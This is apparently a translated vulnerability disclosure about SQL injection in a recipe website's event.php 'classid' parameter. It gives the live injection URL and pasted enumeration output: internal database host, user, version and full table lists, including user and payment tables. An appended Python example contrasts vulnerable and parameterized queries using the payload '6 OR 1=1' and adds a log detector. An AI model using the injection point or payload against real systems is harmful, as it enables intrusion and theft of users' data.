Vulnerability summary (followers: 24)
Vulnerability details
Disclosure status:
2013-07-01: Actively contacting the vendor and waiting for the vendor to claim the report; details not disclosed publicly
2013-08-15: The vendor has actively ignored the vulnerability; details disclosed to the public
Brief description:
As titled..
Detailed description:
Industry sites, round one: Meishi Tianxia (美食天下).
A food site, so let's have a look at the food.. heh..
Injection point: http://home.meishichina.com/event.php?classid=6
Straight to the information:
available databases [4]:
[*] buy
[*] home
[*] information_schema
[*] user
Web Server: 	MESS
DB Server: 	MySQL >=5
Resp. Time(avg):	128 ms
Current User: 	bbsinmsc@10.10.10.236
Sql Version: 	5.5.24-log
Current DB: 	home
System User: 	bbsinmsc@10.10.10.236
Host Name: 	db1.AWmshshhihK`bjTnY
Installation dir: 	/usr/local/mysql
DB User: 	'bbsinmsc'@'10.10.10.%'
Data Bases: 	information_schema
		buy
		home
		user
database management system users [1]:
[*] 'bbsinmsc'@'10.10.10.%'
bbsinmsc@10.10.10.%
current user:    'bbsinmsc@10.10.10.%'
Database: buy
[23 tables]
+---------------+
| ask           |
| card          |
| cart          |
| category      |
| charge        |
| coupon        |
| feedback      |
| flow          |
| friendlink    |
| invite        |
| order         |
| page          |
| partner       |
| pay           |
| r_item        |
| shop_category |
| shop_goods    |
| smssubscribe  |
| subscribe     |
| system        |
| team          |
| topic         |
| user          |
+---------------+
Database: home
[261 tables]
+----------------------------------+
| `r`st123`                        |
| fp                               |
| uchome_ad                        |
| uchome_adminsession              |
| uchome_album                     |
| uchome_blacklist                 |
| uchome_block                     |
| uchome_blog                      |
| uchome_blogfield                 |
| uchome_cache                     |
| uchome_cache0                    |
| uchome_cache0c                   |
| uchome_cache4                    |
| uchome_cache5                    |
| uchome_cache8                    |
| uchome_cachea                    |
| uchome_cachec                    |
| uchome_cachecd                   |
| uchome_cached                    |
| uchome_cachee                    |
| uchome_cachee8                   |
| uchome_cachef                    |
| uchome_charm_grade               |
| uchome_class                     |
| uchome_client_application        |
| uchome_client_spread             |
| uchome_cms_article               |
| uchome_comment                   |
| uchome_config                    |
| uchome_cron                      |
| uchome_daily_disgest             |
| uchome_daily_fav                 |
| uchome_data                      |
| uchome_docomment                 |
| uchome_doing                     |
| uchome_event_app_coupons         |
| uchome_event_app_detail          |
| uchome_event_app_device          |
| uchome_event_app_exam            |
| uchome_event_app_fav             |
| uchome_event_app_hao123          |
| uchome_event_app_items           |
| uchome_event_app_log             |
| uchome_event_app_mc              |
| uchome_event_app_prize           |
| uchome_event_app_question        |
| uchome_event_app_result          |
| uchome_event_app_ret             |
| uchome_event_app_shake           |
| uchome_event_app_share           |
| uchome_every_day_recipe_viewnum  |
| uchome_exchange_gold_log         |
| uchome_feed                      |
| uchome_filter                    |
| uchome_follow_day_count          |
| uchome_follow_group              |
| uchome_follow_group_users        |
| uchome_friend                    |
| uchome_friendlog                 |
| uchome_get_gold_log              |
| uchome_gold_category             |
| uchome_gold_management           |
| uchome_haierque_result           |
| uchome_impression                |
| uchome_invite                    |
| uchome_log                       |
| uchome_mailcron                  |
| uchome_mailqueue                 |
| uchome_medal                     |
| uchome_medal_apply               |
| uchome_member                    |
| uchome_members                   |
| uchome_mtag                      |
| uchome_mtaginvite                |
| uchome_myapp                     |
| uchome_myinvite                  |
| uchome_notification              |
| uchome_oscomment                 |
| uchome_pic                       |
| uchome_plug_a_blog               |
| uchome_plug_ad_magic             |
| uchome_plug_address              |
| uchome_plug_advert_item          |
| uchome_plug_advert_log           |
| uchome_plug_aladdin_byid         |
| uchome_plug_aladdin_caipu        |
| uchome_plug_aladdin_shicai       |
| uchome_plug_aladdin_soso         |
| uchome_plug_app_baidu            |
| uchome_plug_app_douban           |
| uchome_plug_app_kaixin           |
| uchome_plug_app_msn              |
| uchome_plug_app_qq               |
| uchome_plug_app_qqweibo          |
| uchome_plug_app_renren           |
| uchome_plug_app_sina             |
| uchome_plug_app_taobao           |
| uchome_plug_app_token            |
| uchome_plug_app_user             |
| uchome_plug_baidu_key            |
| uchome_plug_baidu_recipes        |
| uchome_plug_blog_sub             |
| uchome_plug_blogs                |
| uchome_plug_click                |
| uchome_plug_client_app           |
| uchome_plug_client_hot           |
| uchome_plug_client_objects       |
| uchome_plug_client_recipes       |
| uchome_plug_collect_collection   |
| uchome_plug_collect_in           |
| uchome_plug_collect_item         |
| uchome_plug_content_ingredient   |
| uchome_plug_content_item         |
| uchome_plug_content_steps        |
| uchome_plug_corp_class           |
| uchome_plug_corp_field           |
| uchome_plug_corp_pic             |
| uchome_plug_corp_sort            |
| uchome_plug_corp_supply          |
| uchome_plug_coupon_codes         |
| uchome_plug_coupon_item          |
| uchome_plug_coupon_log           |
| uchome_plug_credit_log           |
| uchome_plug_daren_blogfield      |
| uchome_plug_daren_class          |
| uchome_plug_daren_pic            |
| uchome_plug_daren_product        |
| uchome_plug_daren_rating         |
| uchome_plug_daren_sort           |
| uchome_plug_data                 |
| uchome_plug_data_desc            |
| uchome_plug_data_history         |
| uchome_plug_event_actor          |
| uchome_plug_event_award          |
| uchome_plug_event_invote         |
| uchome_plug_event_item           |
| uchome_plug_event_registration   |
| uchome_plug_event_vote           |
| uchome_plug_event_votelog        |
| uchome_plug_fav                  |
| uchome_plug_feedback             |
| uchome_plug_food_class           |
| uchome_plug_food_item            |
| uchome_plug_food_itemfeild       |
| uchome_plug_food_photo           |
| uchome_plug_game_flashgame       |
| uchome_plug_gift_item            |
| uchome_plug_gift_shop            |
| uchome_plug_giftshop_item        |
| uchome_plug_giftshop_log         |
| uchome_plug_group                |
| uchome_plug_group_follower       |
| uchome_plug_ingredient           |
| uchome_plug_ingredient_brand     |
| uchome_plug_ingredient_brand_rel |
| uchome_plug_ingredient_category  |
| uchome_plug_ingredient_nutrition |
| uchome_plug_ingredient_recipes   |
| uchome_plug_like                 |
| uchome_plug_location             |
| uchome_plug_location_member      |
| uchome_plug_mail                 |
| uchome_plug_osfav                |
| uchome_plug_pai_in               |
| uchome_plug_pai_like             |
| uchome_plug_pai_location         |
| uchome_plug_pai_photo            |
| uchome_plug_pai_recommend        |
| uchome_plug_pai_tag              |
| uchome_plug_pai_tagfield         |
| uchome_plug_pai_tips             |
| uchome_plug_play_flashgame       |
| uchome_plug_post_comment         |
| uchome_plug_post_field           |
| uchome_plug_post_item            |
| uchome_plug_post_photo           |
| uchome_plug_project              |
| uchome_plug_recipe_blog          |
| uchome_plug_recipe_down          |
| uchome_plug_recipe_ingredient    |
| uchome_plug_recipe_item          |
| uchome_plug_recipe_photo         |
| uchome_plug_recipe_rating        |
| uchome_plug_recipe_set           |
| uchome_plug_recipe_share         |
| uchome_plug_recipe_steps         |
| uchome_plug_recipe_tag           |
| uchome_plug_recipe_trigger       |
| uchome_plug_recommend            |
| uchome_plug_report               |
| uchome_plug_res_index            |
| uchome_plug_search_log           |
| uchome_plug_shop_city            |
| uchome_plug_shop_item            |
| uchome_plug_shop_type            |
| uchome_plug_show_photo           |
| uchome_plug_show_photoset        |
| uchome_plug_show_top             |
| uchome_plug_smartcogs_log        |
| uchome_plug_spaceinfo            |
| uchome_plug_sync_app             |
| uchome_plug_sync_log             |
| uchome_plug_tag                  |
| uchome_plug_tag_user             |
| uchome_plug_tags                 |
| uchome_plug_tips                 |
| uchome_plug_tool_article         |
| uchome_plug_tool_fav_item        |
| uchome_plug_tool_fav_url         |
| uchome_plug_tool_signin_item     |
| uchome_plug_topic                |
| uchome_plug_topic_area           |
| uchome_plug_topic_in             |
| uchome_plug_topic_item           |
| uchome_plug_topic_oldmove        |
| uchome_plug_tuan_actor           |
| uchome_plug_tuan_item            |
| uchome_plug_user_addr            |
| uchome_plug_vote_answer          |
| uchome_plug_vote_item            |
| uchome_plug_vote_record          |
| uchome_plug_wall                 |
| uchome_plug_wap_click            |
| uchome_plug_wap_collect          |
| uchome_plug_work_admin_log       |
| uchome_plug_work_promotion       |
| uchome_poke                      |
| uchome_post                      |
| uchome_profield                  |
| uchome_profilefield              |
| uchome_recipemain_tag            |
| uchome_reply                     |
| uchome_report                    |
| uchome_search_log                |
| uchome_session                   |
| uchome_share                     |
| uchome_shield_space              |
| uchome_show                      |
| uchome_space                     |
| uchome_space_impression          |
| uchome_spacefield                |
| uchome_spacelog                  |
| uchome_system_notification       |
| uchome_tag                       |
| uchome_tagblog                   |
| uchome_tagspace                  |
| uchome_task                      |
| uchome_thread                    |
| uchome_topic_indexpic            |
| uchome_trace                     |
| uchome_unread_notification       |
| uchome_use_log                   |
| uchome_user_follows              |
| uchome_user_medal                |
| uchome_userapp                   |
| uchome_usergroup                 |
| uchome_userlog                   |
| uchome_usertask                  |
| uchome_v_attest                  |
| uchome_visitor                   |
| uchome_wap_data_cache            |
+----------------------------------+
......
How much member information is there? Heh..
 
Proof of vulnerability:
Fix suggestion:
You know what to do. Any gifts? After all, this wasn't easy for me either.
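The report leaves the fix unstated, so the following is an added example (not code from the original report or from the site) of what "you know what to do" amounts to for a parameter like `classid`: the raw query-string value must never be spliced into SQL text. It uses a constructed in-memory SQLite table with a hypothetical `event` schema as a stand-in for the site's database, shows the string-concatenation pattern beside a hardened version that whitelists `classid` as an integer and binds it as a parameter, and finishes with a small detection routine that flags requests to `event.php` whose `classid` is not purely numeric. The access-log lines are constructed for the example, not taken from the page.

```python
import re
import sqlite3
from typing import List, Optional, Tuple
from urllib.parse import parse_qs, urlsplit

# Hypothetical schema and rows standing in for the site's event table (constructed).
SCHEMA = """
CREATE TABLE event (id INTEGER PRIMARY KEY, classid INTEGER, title TEXT);
INSERT INTO event VALUES (1, 6, 'class-6 event A');
INSERT INTO event VALUES (2, 6, 'class-6 event B');
INSERT INTO event VALUES (3, 7, 'class-7 event');
"""


def make_db() -> sqlite3.Connection:
    """Fresh in-memory database loaded with the constructed rows."""
    conn = sqlite3.connect(":memory:")
    conn.executescript(SCHEMA)
    return conn


def events_vulnerable(conn: sqlite3.Connection, classid: str) -> List[Tuple[int, str]]:
    """The defect pattern: the query-string value becomes part of the SQL text,
    so anything appended to the number is executed as SQL."""
    sql = "SELECT id, title FROM event WHERE classid = " + classid
    return conn.execute(sql).fetchall()


def parse_classid(raw: str) -> Optional[int]:
    """Whitelist validation: classid is a non-negative ASCII integer, or it is rejected."""
    raw = raw.strip()
    if not (raw.isascii() and raw.isdigit()):
        return None
    return int(raw)


def events_hardened(conn: sqlite3.Connection, classid: str) -> List[Tuple[int, str]]:
    """Validate first, then bind the value as a parameter so it can never alter the query."""
    cid = parse_classid(classid)
    if cid is None:
        return []  # the web layer would answer 400 Bad Request here
    return conn.execute(
        "SELECT id, title FROM event WHERE classid = ?", (cid,)
    ).fetchall()


# Constructed sample access-log lines (not from the report) in combined-log style.
SAMPLE_LOG = [
    '10.0.0.1 - - [01/Jul/2013:10:00:00 +0800] "GET /event.php?classid=6 HTTP/1.1" 200 512',
    '10.0.0.2 - - [01/Jul/2013:10:00:01 +0800] "GET /event.php?classid=6%20OR%201%3D1 HTTP/1.1" 200 9876',
    '10.0.0.3 - - [01/Jul/2013:10:00:02 +0800] "GET /index.php HTTP/1.1" 200 300',
]

REQUEST_RE = re.compile(r'"(?:GET|POST) (\S+) HTTP/')


def flag_non_numeric_classid(lines: List[str]) -> List[Tuple[str, str]]:
    """Detection: return (path, decoded value) for every request whose classid
    parameter fails the same whitelist the hardened handler enforces."""
    hits = []
    for line in lines:
        match = REQUEST_RE.search(line)
        if not match:
            continue
        url = urlsplit(match.group(1))
        for value in parse_qs(url.query).get("classid", []):
            if parse_classid(value) is None:
                hits.append((url.path, value))
    return hits


if __name__ == "__main__":
    db = make_db()
    print("vulnerable, tampered value:", events_vulnerable(db, "6 OR 1=1"))
    print("hardened, tampered value:  ", events_hardened(db, "6 OR 1=1"))
    print("flagged requests:          ", flag_non_numeric_classid(SAMPLE_LOG))
```

The validation and the bound parameter are independent layers: binding alone would already stop the value from being parsed as SQL, and the whitelist additionally gives the application a clean 400 path and a signal worth logging. The same `parse_classid` rule drives the log check, so detection and the fix agree on what a legitimate value looks like.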
Copyright notice: when reposting, please credit the source: 爱上平顶山@乌云
Vulnerability response
Vendor response:
Unable to contact the vendor, or the vendor actively declined